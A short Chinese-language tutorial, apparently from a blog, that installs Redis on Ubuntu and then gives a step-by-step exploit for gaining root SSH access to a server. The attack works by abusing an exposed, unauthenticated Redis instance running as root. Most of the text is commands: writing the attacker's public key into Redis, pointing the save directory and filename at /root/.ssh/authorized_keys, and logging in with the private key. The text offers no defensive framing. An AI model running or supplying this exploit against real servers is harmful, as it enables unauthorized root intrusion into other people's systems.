redis與ssh-keygen

在ubuntu上安裝是非常友善的，兩個指令就行了。

$sudo apt-get update

$sudo apt-get install redis-server

若是redis-cli指令出現redis 127.0.0.1:6379>，則安裝成功了

如何根據Redis和ssh入侵入侵伺服器。原理上并不複雜，隻是利用的規則有點苛刻：

1. redis要暴露在公網上

2. 嗯ssh程序也得開

3. Redis要是以root的權限啟動的。（這個指令就是以root權限啟動的（端口随便填）：redis-server --port 6369）

先在本地建個ssh的秘鑰

ssh-keygen -t rsa

cd ~/.ssh/

然後将公鑰寫入文本中（文本還可以有路徑，比如說/tmp/1.txt）

前後空兩行，公鑰的内容就不會跟redis的内容混在一起了

(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n")>1.txt

然後把裡面的内容設定到遠端的redis伺服器上，設定key為233

cat 1.txt | redis-cli -h xxx.xxx.x.xx -p 6379  -x set 233

遠端連接配接一下

redis-cli -h xxx.xxx.x.xx

修改儲存的路徑

xxx.xxx.x.xx :6379> config set dir /root/.ssh/

xxx.xxx.x.xx :6379> config get dir

修改儲存的名稱

xxx.xxx.x.xx :6379> config set dbfilename "authorized_keys"

儲存

xxx.xxx.x.xx :6379> save

SAVE 指令執行一個同步儲存操作，将目前 Redis 執行個體的所有資料快照(snapshot)以 RDB 檔案的形式儲存到硬碟。

遠端利用自己的私鑰登入該伺服器。

ssh -i id_rsa [email protected]